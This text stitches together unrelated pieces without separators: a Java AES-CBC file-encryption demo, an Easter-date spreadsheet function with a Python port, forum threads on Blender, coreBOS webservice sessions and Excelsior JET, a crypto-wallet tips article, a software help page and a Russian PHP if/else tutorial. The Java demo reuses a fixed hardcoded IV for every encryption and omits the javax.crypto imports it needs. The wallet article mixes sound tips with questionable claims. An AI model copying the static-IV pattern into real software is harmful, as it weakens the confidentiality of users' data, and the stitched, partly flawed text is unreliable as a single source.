import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.Charset;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;

import static java.lang.System.*;

/**
 * Demonstrate use of CipherOutputStream and CipherInputStream to encipher and decipher a message.
 * <p/>
 * This particular version uses AES/CBC/PKCS5Padding
 * but it is fairly easy to convert it to use other algorithms.
 * Requires a shared secret key.
 *
 * @author Roedy Green, Canadian Mind Products
 * @version 1.0 2008-06-17
 * @since 2008-06-17
 */
public class TestCipherAES {

    /**
     * configure with encryption algorithm to use. Avoid insecure DES.
     * Changes to algorithm may require additional ivParms.
     */
    private static final String ALGORITHM = "AES";

    /**
     * configure with block mode to use. Avoid insecure ECB.
     */
    private static final String BLOCK_MODE = "CBC";

    /**
     * configure with padding method to use
     */
    private static final String PADDING = "PKCS5Padding";

    /**
     * the encoding to use when converting bytes <--> String
     */
    private static final Charset CHARSET = Charset.forName( "UTF-8" );

    /**
     * 128 bits worth of some random, not particularly secret, but stable bytes to salt AES-CBC with
     */
    private static final IvParameterSpec CBC_SALT = new IvParameterSpec(
            new byte[] { 7, 34, 56, 78, 90, 87, 65, 43, 12, 34, 56, 78, -123, 87, 65, 43 } );

    /**
     * generate a random AES style Key
     *
     * @return the AES key generated.
     * @throws java.security.NoSuchAlgorithmException if AES is not supported.
     */
    private static SecretKeySpec generateKey() throws NoSuchAlgorithmException {
        final KeyGenerator kg = KeyGenerator.getInstance( ALGORITHM );
        kg.init( 128 );  // specify key size in bits
        final SecretKey secretKey = kg.generateKey();
        final byte[] keyAsBytes = secretKey.getEncoded();
        return new SecretKeySpec( keyAsBytes, ALGORITHM );
    }

    /**
     * read an enciphered file and retrieve its plaintext message.
     *
     * @param cipher method used to encrypt the file
     * @param key    secret key used to encrypt the file
     * @param file   file where the message was written.
     *
     * @return the reconstituted decrypted message.
     * @throws java.security.InvalidKeyException if something wrong with the key.
     * @throws java.io.IOException               if problems reading the file.
     */
    @SuppressWarnings( { "JavaDoc" } )
    private static String readCiphered( Cipher cipher, SecretKeySpec key, File file )
            throws InvalidKeyException, IOException, InvalidAlgorithmParameterException {
        cipher.init( Cipher.DECRYPT_MODE, key, CBC_SALT );
        final CipherInputStream cin = new CipherInputStream( new FileInputStream( file ), cipher );
        // read big endian short length, msb then lsb
        final int messageLengthInBytes = ( cin.read() << 8 ) | cin.read();
        out.println( file.length() + " enciphered bytes in file" );
        out.println( messageLengthInBytes + " reconstituted bytes" );
        final byte[] reconstitutedBytes = new byte[ messageLengthInBytes ];
        // we can't trust CipherInputStream to give us all the data in one shot
        int bytesReadSoFar = 0;
        int bytesRemaining = messageLengthInBytes;
        while ( bytesRemaining > 0 ) {
            final int bytesThisChunk = cin.read( reconstitutedBytes, bytesReadSoFar, bytesRemaining );
            if ( bytesThisChunk <= 0 ) {  // read returns -1 on premature EOF
                throw new IOException( file.toString() + " corrupted." );
            }
            bytesReadSoFar += bytesThisChunk;
            bytesRemaining -= bytesThisChunk;
        }
        cin.close();
        return new String( reconstitutedBytes, CHARSET );
    }

    /**
     * write a plaintext message to a file enciphered.
     *
     * @param cipher    the method to use to encrypt the file.
     * @param key       the secret key to use to encrypt the file.
     * @param file      the file to write the encrypted message to.
     * @param plainText the plaintext of the message to write.
     *
     * @throws java.security.InvalidKeyException                if something is wrong with the key
     * @throws java.io.IOException                              if there are problems writing the file.
     * @throws java.security.InvalidAlgorithmParameterException if problems with CBC_SALT.
     */
    private static void writeCiphered( Cipher cipher, SecretKeySpec key, File file, String plainText )
            throws InvalidKeyException, IOException, InvalidAlgorithmParameterException {
        cipher.init( Cipher.ENCRYPT_MODE, key, CBC_SALT );
        final CipherOutputStream cout = new CipherOutputStream( new FileOutputStream( file ), cipher );
        final byte[] plainTextBytes = plainText.getBytes( CHARSET );
        out.println( plainTextBytes.length + " plaintext bytes written" );
        // prepend with big-endian short message length, will be encrypted too.
        cout.write( plainTextBytes.length >>> 8 );   // msb
        cout.write( plainTextBytes.length & 0xff );  // lsb
        cout.write( plainTextBytes );
        cout.close();
    }

    /**
     * Demonstrate use of CipherOutputStream and CipherInputStream to encipher and decipher a message.
     *
     * @param args not used
     *
     * @throws java.security.NoSuchAlgorithmException           if AES is not supported
     * @throws javax.crypto.NoSuchPaddingException              if PKCS5 padding is not supported.
     * @throws java.security.InvalidKeyException                if there is something wrong with the key.
     * @throws java.io.IOException                              if there are problems reading or writing the file.
     * @throws java.security.InvalidAlgorithmParameterException if problems with CBC_SALT.
     */
    public static void main( String[] args )
            throws InvalidAlgorithmParameterException, InvalidKeyException, IOException,
                   NoSuchAlgorithmException, NoSuchPaddingException {
        // The secret message we want to send to our secret agent in London.
        final String plainText = "Q.E. to throw cream pies at Cheney and Bush tomorrow at 19:05.";
        // use a random process to generate an enciphering key
        SecretKeySpec key = generateKey();
        final Cipher cipher = Cipher.getInstance( ALGORITHM + "/" + BLOCK_MODE + "/" + PADDING );
        // write out the ciphered message
        writeCiphered( cipher, key, new File( "transport.bin" ), plainText );
        // now try reading the message back in, deciphering it.
        final String reconstitutedText = readCiphered( cipher, key, new File( "transport.bin" ) );
        out.println( "original: " + plainText );
        out.println( "reconstituted: " + reconstitutedText );
        // output is:
        // 62 plaintext bytes written
        // 80 enciphered bytes in file
        // 62 reconstituted bytes
        // original: Q.E. to throw cream pies at Cheney and Bush tomorrow at 19:05.
        // reconstituted: Q.E. to throw cream pies at Cheney and Bush tomorrow at 19:05.
    }
}
TagMyCode

Posted by: Pavel San
Added: Feb 19, 2015 9:50 AM
Modified: Feb 19, 2015 10:32 AM

Function for LibreOffice to calculate Easter Day (Catholic) in a cell.
Source: https://en.wikipedia.org/wiki/Computus#Gauss_algorithm

REM  *****  BASIC  *****
REM Gauss algorithm for computing the date of Easter (Catholic)
REM Source: Wikipedia
REM ************************************************
Function EasterDayCatolic(Year)
  a = Year Mod 19
  b = Year Mod 4
  c = Year Mod 7
  k = int (Year/100)
  p = int ((13 + 8 * k)/25)
  q = int (k/4)
  M = (15 - p + k - q) mod 30
  N = (4 + k - q) mod 7
  d = (19 * a + M) mod 30
  e = (2 * b + 4 * c + 6 * d + N) mod 7
  If (d + e) <= 9 Then
    Mo = 3 ' March
    Da = 22 + d + e
  Else
    Mo = 4 ' April
    Da = d + e - 9
  End If
  EasterDayCatolic = DateSerial(Year, Mo, Da)
End Function
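For cross-checking the Basic function, here is the same Gauss computus as a Python port. Like the snippet above, it applies only the basic Gauss formula, without the two rare exception rules the full algorithm adds for certain values of d:

```python
def easter_catholic(year):
    """Date of Gregorian Easter via the Gauss computus -- a direct port of
    the Basic function above, without the two rare exception rules."""
    a = year % 19
    b = year % 4
    c = year % 7
    k = year // 100
    p = (13 + 8 * k) // 25
    q = k // 4
    m = (15 - p + k - q) % 30
    n = (4 + k - q) % 7
    d = (19 * a + m) % 30
    e = (2 * b + 4 * c + 6 * d + n) % 7
    if d + e <= 9:
        return (year, 3, 22 + d + e)  # March
    return (year, 4, d + e - 9)       # April

print(easter_catholic(2024))  # (2024, 3, 31) -- Easter 2024 fell on March 31
```

Feeding a few known dates through both versions is an easy way to confirm the spreadsheet function was typed in correctly.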
Blender face snap working on hidden grid

Blender face snap works like a grid. The further the distance, the more jerky the vertex movement. In the past, a vertex used to slide smoothly on the surface; now it moves in steps of an invisible grid. This is very disturbing, especially in small areas of the topology. What can be done about it? Is it a bug, or is there a setting that switches off the grid for face snap mode?

You probably have several snap targets enabled

There’s only one high poly

Open the snap popover and check what you’ve got selected

Face snapping mode selected. I have a high poly and a low poly.

Unchecking “Project Onto Self” should help already?

I tried all the modes in turn, together and one at a time. No changes. I tried to make the mesh denser, but it did not help.

Please do a video capture

I found a strange reason. If you switch to orthogonal projection mode, everything is fine. The perspective projection is bad.

I created a new file, added a Suzanne and subdivided it several times. I copied the version without subdivision. Everything works correctly, even in perspective projection mode.

Orthogonal projection mode? What is that?

I recorded a video, you can see where I switch the projection.

There indeed looks like there is some sort of “increment” snapping going on… this does not happen on my end. I don’t see a difference between perspective and orthographic view though… (is that what you meant by “orthogonal”? = “oblique projection”)

Can you share the file?

No blend file extension here

I think I will just do it in orthographic mode (orthographic and orthogonal are the same in this case)

Thank you for trying to help.

No blend file extension? I don’t know what you mean
Hardware Crypto Wallet Security Tips
By Boris Dzhingarov

Hardware crypto wallets are the secure way to keep your cryptocurrencies. A hardware crypto wallet is nothing but a hardware device where you can store your cryptocurrency private keys digitally; it allows you to do transactions online while storing the private keys securely in the hardware.

How to use a hardware wallet?
You just need to plug it into your PC or laptop and use the website to do the transactions. Your computer will initialize the hardware wallet and automatically install the secured wallet software that creates the public and private keys. These keys are stored internally in the hardware and they are considered secure because they are stored in the hardware device.

Are hardware crypto wallet devices secure?
Hardware crypto wallets are considered to be more secure because they are physical hardware devices and are not easy to hack.

Which hardware crypto wallet is considered to be the best?
• The Trezor hardware crypto wallet is considered to be the best bitcoin hardware crypto wallet in 2021.
• There is also a simplified version called Trezor One.
• The Ledger Nano S is another top hardware crypto wallet that protects everything with a PIN.
• Coinkite ColdCard and Billfold Steel are also considered to be safe hardware crypto wallets.

How many hardware crypto wallets must one have?
It is always safe to have multiple hardware wallets, as you cannot rely on a single hardware wallet. With a single wallet, you may lose it or it may get destroyed accidentally. If you have multiple wallets, the other wallet will be helpful to recover the crypto funds. So you should have at least two hardware wallets.

How to secure your hardware crypto wallets?
The following hardware crypto wallet security tips will help you keep your crypto funds more secure:
1. Always buy hardware wallets from the original hardware manufacturer or their authorized dealers with a legitimate license.
2. Don’t go for discounted offers and don’t buy hardware wallets online.
3. Don’t ever buy a used hardware crypto wallet.
4. When you use your hardware wallet for the first time, check the display for error messages. They could indicate whether the hardware has been tampered with.
5. In a new crypto hardware wallet, the seed will not be pre-printed. If your new hardware wallet has the seed pre-printed, the wallet is suspect. So don’t buy it if the seed is pre-printed.
6. Your new hardware wallet will generate the seed when you start it for the first time. Write this down on paper. It will be needed again when you switch to a new wallet.
7. Always use the software provided with your hardware wallet. A hardware wallet cannot work without software.
8. Don’t use third-party software with your hardware wallet. Use the one provided by the manufacturer.
9. People buy hardware crypto wallets to store larger amounts of cryptocurrencies. Many manufacturers provide a manual on how to inspect your new hardware wallet to check whether it is original or has been altered.
10. Hardware crypto wallets also have internal checks when you run the software provided with the hardware. The software detects if the hardware is compromised and displays error messages on the display of the hardware.

Featured Image Source: Flickr
Synchronize Result Step Synchronize and switch the subcase and simulation across multiple windows on the page. Figure 1. Synchronize Result Step Across Multiple Windows 1. From the Tools menu, select Synchronize Result Step. The Synchronize Result Step dialog is displayed. Note: • A model must be loaded in the active window to allow the tool to start. • The animation mode must be either Linear or Modal. Figure 2. Synchronize Result Step Dialog 2. Select windows to synchronize using the button. 3. Optional: Apply the loadcase and simulation in the current window to all selected windows (in Step 2) using the button. 4. Switch to the previous and next subcases across all selected windows using the Subcase Up and Subcase Down buttons respectively. 5. Switch to the previous and next simulation across all selected windows using the Sim Previous and Sim Next buttons respectively. 6. Optional: Change the step size by which the loadcase and simulations are switching by expanding the Advanced options using the down arrow and selecting a step size. Figure 3. 7. Optional: Apply Style from the current window to all HyperView windows on the current page by using the Select Options button. The Select Options dialog is the same as the Apply Style workflow.
Загрузка RUS | ANG | | StepkinBlog.ru Пока я творю, я живу! Блог посвящен: HTML, CSS, PHP, Wordpress, Bootstrap Главная » Основы PHP » Оператор условия if else Основы PHP с нуля Урок №9 12.09.2017 01:17 1936 пока нет Оператор условия if else Основы PHP с нуля Урок №9 Оператор условия if else Основы PHP с нуля Урок №9 Всем привет! Продолжаем изучать основы PHP с нуля! В этом уроке я расскажу вам об операторе условий if else. В буквальном переводе if означаете «если», а else – «иначе». Сама конструкция if else помогает сверять данные и выводить результат (выводить сообщения, выполнять какую-то команду, перенаправлять пользователя на секретную страницу или впускать в админ-панель). Чтобы научиться писать правильно условия и понять конструкцию if else, я наведу жизненный пример, который очень похож на конструкцию if else. Вы даете своему мозгу команду: как только звучит будильник (6:00), я должен встать, умыться, почистить зубы, одеться и галопом бежать на работу. Если будильник не звонит в 6:00, значит можно спать, так как на работу бежать не нужно. Вы заметили конструкцию if else? Условием будет установленное время будильника «6:00». Если будильник звонит, то встаем и бежим на работу, если не звонит (иначе, еще говорят ложь), значит, спим дальше. Таких примеров жизненных можно навести массу, например: если идет дождь, то сижу дома, если нет дождя, тогда беру мяч и иду играть футбол. Итак, как же можно записать конструкцию if else? Очень просто. Пойдем поэтапно и начнем с простого условия – оператор if. Оператор условия if Для лучшего понимания я изобразил схему конструкции if в виде рисунка: Оператор условия if Теперь попробуем трансформировать жизненный пример, который я навел выше, в код php. <?php $weather = "дождь"; //значение if ($weather=="дождь") // условие { echo "Я сижу дома"; // результат } ?> Если вы сохраните php файл с этим кодом и откроете его через локальный сервер (см. 
урок №3), то в результате получится: Я сижу дома ⇒ Разъяснение кода: В условии я сравнил переменную $weather со значением "дождь" (строка №3). Человеческим языком этот код звучит так: если переменная $weather равна значению "дождь", тогда выводить нужно текст "Я сижу дома". Кстати, напомню вам (если подзабыли урок №8), что знак равенства обозначается двойным знаком «равно», вот так (==). Если к переменной $weather написать другое значение (строка №2), например, снег, тогда в браузере будет пустая страничка, так как условия не были соблюдены. → КОД-ШАБЛОН "КОНСТРУКЦИЯ if": <?php if (условие) { Этот код выполнится, если условие верно } ?>   → Шпаргалка: Равенство: == Пример: if ($a == $b) Не равенство: != Пример: if ($a != $b) Больше: > Пример: if ($a > $b) Меньше: < Пример: if ($a < $b) Больше или равно: >= Пример: if ($a >= $b) Меньше или равно: <= Пример: if ($a <= $b) Логическое «и»: and Пример: if ($a ==$b and $c !=$d) Логическое «или»: or, || Пример: if ($a ==$b || $c !=$d)   Оператор условия if-else Теперь попробуем вывести сообщение, если условия не были соблюдены, а именно, если идет дождь, сижу дома, если нет дождя, беру мяч и иду играть футбол. 
Для лучшего понимания посмотрим рисунок снизу: Оператор условия if-else Теперь схему переведем в реальный код: <?php $weather = "солнце"; //значение if ($weather=="дождь") //условие { echo "Я сижу дома"; //результат если условие верно } else { echo "Я беру мяч и иду играть в футбол"; //результат если условие не верно } ?> Результат: Я беру мяч и иду играть в футбол ⇒ Разъяснение кода: В условии я сравнил переменную $weather со значением "дождь" (строка №3), но так как переменной $weather я присвоил значение "солнце" (строка №2), то условие не было соблюдено (значения не одинаковы), а это значит, что будет работать вторая часть кода (else): else { echo "Я беру мяч и иду играть в футбол"; //результат если условие не верно } → КОД-ШАБЛОН "КОНСТРУКЦИЯ if-else": <?php if (условие) { Этот код выполнится, если условие верно } else { Этот код выполнится, если условие не верно } ?> Двойное условие if-else Переходим к более сложному – двойное условие if-else. Давайте на примере создадим проверку пароля и логина. Цель: Создать условие проверки логина и пароля. Если пароль или логин не совпадают, вывести сообщение об ошибке. Приступим. Создадим для начала две переменные $logo и $password с соответствующими значениями: <?php $logo = "StepkinBLOG"; //значение $password = 1234567890; //значение ?> Теперь создадим двойное условие для проверки переменных $logo и $password: <?php $logo = "StepkinBLOG"; //значение $password = 1234567890; //значение if ($logo =="StepkinBLOG" and $password == 123) //условие { echo "добро пожаловать в админ-панель"; //результат если условие верно } else { echo "Логин или пароль не верный"; //результат если условие не верно } ?> Обратите внимание, в условии мы разделили две переменные оператором "AND". 
This means both variables must be correct for the condition to hold; but since the password in our condition does not match (line #4), the condition is false and you will see this message on the screen:

Incorrect login or password

If you change the value of the variable $password to "123" (line #3), the condition will be fully satisfied (line #4):

<?php
$logo = "StepkinBLOG"; // value
$password = 123; //value
if ($logo == "StepkinBLOG" and $password == 123) //condition
{
    echo "welcome to the admin panel"; //result if the condition is true
}
else
{
    echo "Incorrect login or password"; //result if the condition is false
}
?>

Result:

welcome to the admin panel

Nested if-else constructs

A nested construct is when one construct sits inside another construct. Not entirely clear? No problem, the example will make everything clear.

Goal: create a condition that checks a login and a password. If the password or login does not match, output an error message; if they match, additionally check a secret word. If the secret word does not match, output an error message; if it matches, output the message "welcome to the admin panel".
Let's get started. First create three variables, $logo, $password and $x, with the corresponding values:

<?php
$logo = "StepkinBLOG"; //value
$password = 123; //value
$x = "BlogGOOD"; //value
?>

Now create a two-part condition to check the variables $logo and $password:

<?php
$logo = "StepkinBLOG"; //value
$password = 123; //value
$x = "BlogGOOD"; //value
if ($logo == "StepkinBLOG" and $password == 123) //condition #1
{
    // another condition with the secret word will go here
}
else
{
    echo "Incorrect login or password"; //result if the condition is false
}
?>

Now, under the comment "// another condition with the secret word will go here" (line #7), write one more if-else construct with a condition that checks the variable $x (note the doubled ==; a single = would be an assignment, not a comparison):

<?php
$logo = "StepkinBLOG"; //value
$password = 123; //value
$x = "Stepa"; //value
if ($logo == "StepkinBLOG" and $password == 123) //condition #1
{
    // another condition with the secret word will go here
    if ($x == "BlogGOOD") //condition #2
    {
        echo "welcome to the admin panel"; //result if condition #2 is true
    }
    else
    {
        echo "incorrect secret word"; //result if condition #2 is false
    }
}
else
{
    echo "Incorrect login or password"; //result if condition #1 is false
}
?>

Since the secret word is wrong (line #8), the screen will show the message:

incorrect secret word

If you replace the value of the variable $x with "BlogGOOD", the secret word will be correct too:

<?php
$logo = "StepkinBLOG"; //value
$password = 123; //value
$x = "BlogGOOD"; //value
if ($logo == "StepkinBLOG" and $password == 123) //condition #1
{
    // another condition with the secret word will go here
    if ($x == "BlogGOOD") //condition #2
    {
        echo "welcome to the admin panel"; //result if condition #2 is true
    }
    else
    {
        echo "incorrect secret word"; //result if condition #2 is false
    }
}
else
{
    echo "Incorrect login or password"; //result if condition #1 is false
}
?>

Since the login and password are correct, the condition was met, so the first branch of the code ran, where the secret word had to be checked. And since the secret word also satisfies its condition, you will see this message on the screen:

welcome to the admin panel

→ CODE TEMPLATE "NESTED if-else CONSTRUCT":

<?php
if (condition)
{
    This code runs if the condition is true
    if (condition)
    {
        This code runs if the condition is true
    }
    else
    {
        This code runs if the condition is false
    }
}
else
{
    This code runs if the condition is false
}
?>

The elseif conditional operator

The elseif construct is a combination of the if and else constructs; it helps you check several conditions in a row.

Syntax:

<?
if (condition)
{
    action
}
elseif (condition)
{
    action
}
elseif (condition)
{
    action
}
else
{
    Action if no case matched
}
?>

Note that in lines #6 and #10 the two words are written together as "elseif". (With the curly-brace syntax PHP also accepts "else if" written with a space; it is only in the alternative colon syntax, shown at the end of this lesson, that the single-word form is required.)

Here is a working example with a choice of programming textbook:

<?
// Using elseif
$stepkinblog = "PHP";
if ($stepkinblog == "C++")
{
    echo "You ordered the C++ textbook";
}
elseif ($stepkinblog == "JavaScript")
{
    echo "You ordered the JavaScript textbook";
}
elseif ($stepkinblog == "PHP")
{
    echo "You ordered the PHP textbook";
}
elseif ($stepkinblog == "JAVA")
{
    echo "You ordered the JAVA textbook";
}
else
{
    echo "Make a choice"; //Action if no case matched
}
?>

Result:

You ordered the PHP textbook

The elseif approach can also be written as a nested if-else construct:

<?php
// Using if-else
$stepkinblog = "PHP";
if ($stepkinblog == "C++")
{
    echo "You ordered the C++ textbook";
}
else
{
    if ($stepkinblog == "JavaScript")
    {
        echo "You ordered the JavaScript textbook";
    }
    else
    {
        if ($stepkinblog == "PHP")
        {
            echo "You ordered the PHP textbook";
        }
        else
        {
            if ($stepkinblog == "JAVA")
            {
                echo "You ordered the JAVA textbook";
            }
            else
            {
                echo "Make a choice"; //Action if no case matched
            }
        }
    }
}
?>

The result is the same, only it's easier to get lost (I got lost in my own code twice) :mrgreen:.
A supplement to the lesson (you don't need to know this yet): there are a few more ways to write the if-else construct (alternative syntax). I'll prepare a whole lesson on the alternative syntax where I explain and show everything; for now, just skim it.

Code #1:

<?php $a = 15;
if ($a == 15): ?>
<h3> The variable $a contains the value 15 </h3>
<?php endif; ?>

Code #2:

<?php
$a = 6;
if ($a == 5):
    echo "The variable contains the value 5";
elseif ($a == 6):
    echo "The variable contains the value 6";
else:
    echo "The variable contains neither 5 nor 6";
endif;
?>

Homework: try replacing equality (==) in the condition with inequality (!=), or try the greater-than and less-than signs:

<?
$num = 1;
if ($num <= 10)
{
    echo "the variable is less than or equal to 10";
}
else
{
    echo "the variable is greater than 10";
}
?>

Also try replacing the "AND" operator with "OR". That's all, see you in the next lessons! Subscribe to blog updates!
CoreBOSBB
Full Version: Session duration for webservice

I'm working on the mechanics portal, and was wondering if and how we can set the max session time for a webservice session. Some reports can take up to 40 minutes to fill out, so the session could expire during the filling of the form.

Seems cool, but I've no experience with applying diffs, could you give a few pointers?

(12-19-2016, 07:57 PM)Guido1982 Wrote: [ -> ]Seems cool, but I've no experience with applying diffs, could you give a few pointers?

Copy the file to the top of your install and execute this command:

Code:
patch -p 1 < WebserviceDefineExpireTime.diff

The patch command knows how to read the format and apply the changes for you. In general, the lines that start with minus have to be deleted and the ones with plus added; usually it is the same line with some change. In this case you also get a completely new file with some SQL that you need to execute.

(12-19-2016, 07:57 PM)Guido1982 Wrote: [ -> ]Also, I'd need to update my client library to use this new functionality right?

Yes, you will have to adapt the getChallenge call.

Quote:patch -p 1 < WebserviceDefineExpireTime.diff

Would this also work for a non-git controlled version? In the 'get_challenge', we could set an expiry time. That would be a UNIX timestamp, I assume?

Yes, this works on any coreBOS install. The $exptime parameter is minutes and it gets converted into a unix timestamp, so, yes, you can set any unix timestamp in the database table.
If I were to execute

PHP Code:
INSERT INTO `vtiger_ws_operation_parameters` (`operationid`, `name`, `type`, `sequence`)
VALUES ((SELECT `operationid` FROM `vtiger_ws_operation` WHERE `name` = 'getchallenge'), 'exptime', 'string', 2);

in phpMyAdmin and alter the file '/include/Webservices/AuthToken.php' (the vtws_getchallenge function), this would basically be the same as executing the diff, right?

Wait, I see. The query adds a parameter to the getchallenge function. How cool, never knew you could use a query within a query.

I have a VPS that runs Ubuntu server to play with and learn bash-like commands, but no time to actually get to it.

It worked. I installed log4php on my portal and set up a log message:

Code:
22-12-2016 15:04:11 method: __doChallenge message: Login by Someone, expires at 16:04:11

Obviously I set the expiration to an hour.

I was just debugging another issue and went to create a global variable. I saw these two: 'WebService_Session_Life_Span' and 'WebService_Session_Idle_Time', which got me thinking about this thread. I had a quick look and it turns out that these are the real way to extend the webservice session life span. The patch I shared on the gist extends ONLY the time you have to log in; in other words, the time that the authtoken getChallenge returns is valid. Once you have logged in you are given a sessionid, which is what you use for the rest of the calls. The life of this sessionid is controlled by the two global variables above, and they are what will permit you to keep connected to the service. The documentation on the global variable module says:

WebService_Session_Idle_Time: Maximum life span that a session should be kept alive after the last transaction. Default is 1800 (seconds). That means that after each access to the service the life of the session is set to 1800 seconds, so you can keep the session open just by accessing it within this time.

WebService_Session_Life_Span: Maximum life span of a webservice session.
After this time the session will be destroyed even if it is being kept alive. Default is a day. This is the one you want to change in your install.

That's what I suspected: I did some tests and it turned out that I was able to do updates when my session should have been expired, and vice versa: not being able to update when I should have been allowed to. I checked the docs and was amazed that the challenge set the session expiration instead of the login, but it seems that wonder was justified.

Good to have you around again, thanks for the GVs. I think I need the other one though, "Session Idle Time". The form the mechanics need to fill in can take more than 30 minutes (1800 seconds), and after that the update fails and the login is displayed. They will never be logged in for more than a day, and there will be no issues when they accidentally try to do so.
Excelsior Forums: Posts posted by xcr

1. Hello, The application is one exe, and the other jars are compiled into DLLs. My question is whether the size and number of dependencies affect the startup time of the application?

Yes, splitting an application into multiple components may increase startup time due to loading the libraries. It may also significantly reduce the effect of using the Startup Optimization Toolkit included with Excelsior JET. For more details, please see the "Startup time optimization" chapter of the documentation.

Best Regards, Svyatoslav

2. I have 4 PCs running game clients, and at least once a day one of them quits to desktop while the others just keep on running.

Does the crash occur on the same PC every time? If so, are there any differences in the OS configurations of the PCs? Which version of JET do you use? Does anything appear in the dmesg output or syslog when the crash occurs?

3. Hi, Could you please show your LD_LIBRARY_PATH value? (run echo $LD_LIBRARY_PATH in a console) Also, please enable full stack trace support on the "Target" page of the JET Control Panel, then re-compile, re-pack and re-install your application. Then please run it again and post a stack trace here.

4. "Resistance to the SA_RESTART flag" means that the application will not misbehave (it will write the correct number of bytes) when it receives the SA_RESTART flag in a signal. The SA_RESTART flag itself does not make the application misbehave; it actually helps to cut off possible problems caused by wrong handling of EINTR. The application misbehaves due to wrong handling of interruption. Disabling the SA_RESTART flag would not make the write issue disappear, but some new issues may pop up.

I would like to know how I can send, in an automated way, multiple signals to my application, to check correct handling of write interruption.

Please try to stress test the thread executing this native code with Thread.suspend()/resume().

5. It is actually not a defect.
The location of Special Windows Folders (like Application Data, My Documents, etc.) depends on the installation type: Common or Personal. The special folder "Application Data" is resolved via "CSIDL_APPDATA" or "CSIDL_COMMON_APPDATA" depending on the installation type.

CSIDL_APPDATA - The file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\username\Application Data.

CSIDL_COMMON_APPDATA - The file system directory that contains application data for all users. A typical path is C:\Documents and Settings\All Users\Application Data. This folder is used for application data that is not user specific.

You can select which type of installation better suits your needs from the "Installation type" combo box, which is located on the "Settings" page, "Install" tab. The following options are available:

Auto-detect - if the logged-in user has the required administrative rights, the application will be installed as "Common" and will be available to all users of that machine. Otherwise the application will be installed as "Personal" and will be available only to the user that installed it.

User decide - if the user has administrative rights, he will be prompted to select the installation type. Otherwise, the application will be installed as "Personal".

Common - the application will be available to all users of that machine. If the logged-in user is not a member of the "Administrators" user group, he will be notified that administrative privileges are required to install the application.

Personal - the application will be available only to the user that installed it. It is assumed that the installation does not require administrative privileges.

So if you want your application to be installed to the user's application data, please choose "Personal".

6. What other calls apart from write can be interrupted? Can you refer me to some documentation?
Please start with the section "Interruption of system calls and library functions by signal handlers" at http://man7.org/linux/man-pages/man7/signal.7.html Note that we use the SA_RESTART flag.

How do you recommend we fix/work around 3rd-party JNI libs for which we will never have the source code?

The assumption that a system call from a native library will never be interrupted is wrong. It is not enforced by the Java specification, so using a system call without checking whether it was interrupted is a bug. Even with the source code of Excelsior JET you can't do anything to reliably work around this bug in the library if you don't have its source code. So the only recommendation is to contact the authors of the library and ask them to fix it, because it is much easier to fix a library than to re-implement threading in the VM.

7. The implementation of threading in the Excelsior JET VM differs from that of the Oracle JVM. Although we use signal handling in our implementation for Linux, it still complies with the Java specification, which is also confirmed by the fact that Excelsior JET passes the JCK. On the other hand, the behavior of the write call when it writes only a part of the data is expected and described in its documentation. Sometimes it happens that an application or native library works on the Oracle JVM but does not work on Excelsior JET (and some other VMs too) due to relying on implementation features not enforced by the Java specification. You may find other examples of such problems in the pinned topics of "Defect Reports" on the forum.

8. You are welcome! Also, this method requires creating a batch script, so it may be inconvenient. Here are the alternatives:

1) You can build your application with a fake empty audio.zip file, opting not to pack it into the executable in the JET Control Panel, then add it to the installation package on the "Resources" page of JetPack II. That way it will be included in the classpath. After installation the fake empty archive can be replaced by the real one.
2) You can create a multi-app executable by choosing the corresponding option on the "Target" page of the JET Control Panel. This executable may take the "java.class.path" property from its arguments. Then in JetPack II you can choose the corresponding application shortcut on the "Shortcuts" tab of the "Misc" page and specify the application classpath by adding "-Djava.class.path=<classpath>" to its arguments.

9. Then you can do this by explicitly specifying the classpath for the deployed application before launching it, using the environment variable JETVMPROP. You should add "-Djava.class.path=<classpath>" to it, where <classpath> should be replaced by the classpath your deployed application uses, including the path to audio.zip. For example:

set JETVMPROP="-Djava.class.path=.\resources\audio.zip"
App.exe

Please try this and let us know if it helps.

10. You can also try the following solution:

// requires: import java.io.File; import javax.sound.sampled.*;
public audio(String audioFile) {
    try {
        AudioInputStream audioInputStream = AudioSystem.getAudioInputStream(new File(audioFile));
        DataLine.Info info = new DataLine.Info(Clip.class, audioInputStream.getFormat());
        final Clip clip = (Clip) AudioSystem.getLine(info);
        clip.addLineListener(new LineListener() {
            public void update(LineEvent e) {
                if (e.getType() == LineEvent.Type.STOP) {
                    synchronized (clip) {
                        clip.notify();
                    }
                }
            }
        });
        clip.open(audioInputStream);
        clip.start();
        synchronized (clip) {
            clip.wait();
        }
        clip.drain();
        clip.close();
    } catch (Exception ex) {
        ex.printStackTrace();
    }
}

(based on http://www.ibm.com/developerworks/java/library/j-5things12/index.html#N101F8) It works well on my system.

11. Hello, First of all, you should go to the Excelsior JET directory (/excelsior/jet7.6-eval) and run

. setenv

This will add the JET directories to your PATH environment variable.
Then you can compile Tomcat with the applications from the command line using the following command:

jc =tomcat /prd/rsp/tomcat6.0/

Alternatively, you can create a project file (.prj) using the JET Control Panel on Windows, and then on Linux use

jc =p your_project_file.prj

You should run this command from the same directory where the project file is located, and its relative path to the Tomcat directory should be the same as on the system where you created the project file.

12. Do you use 64-bit CentOS? This may cause the problem, since JET is 32-bit. If your CentOS is 32-bit, the following is irrelevant.

Do you have a 32-bit version of the libnss_ldap.so.2 library on your system? It should be found in /lib or /lib32. To ensure it is 32-bit, you may check it with "file -L":

$ file -L /lib/libnss_ldap.so.2
/lib/libnss_ldap.so.2: ELF 32-bit ...

Also, to check whether a 32-bit program on your system can correctly get passwd info from the LDAP directory, please compile the test program from my previous post in 32-bit mode and run it. If you do not have a 32-bit Linux machine to easily compile the program, you may use the following command:

gcc -m32 test.c

(This probably requires installing additional packages with 32-bit development files.)

13. passwd: files ldap

That looks correct. Please run the following command in your terminal:

getent passwd $(id -u)

Does it output the user info correctly, or does it silently exit? Also, if you can compile a C program, could you please build and run the following test:

#include <stdio.h>
#include <pwd.h>
#include <unistd.h>
#include <errno.h>

int main() {
    struct passwd * pw = getpwuid(getuid());
    if (pw == NULL) {
        printf("No user info found; errno=%d\n", errno);
    } else {
        printf("name\t%s\nuid\t%d\nhome\t%s\n", pw->pw_name, pw->pw_uid, pw->pw_dir);
    }
    return 0;
}

Does it output your user info? If it does not, what message does it show?
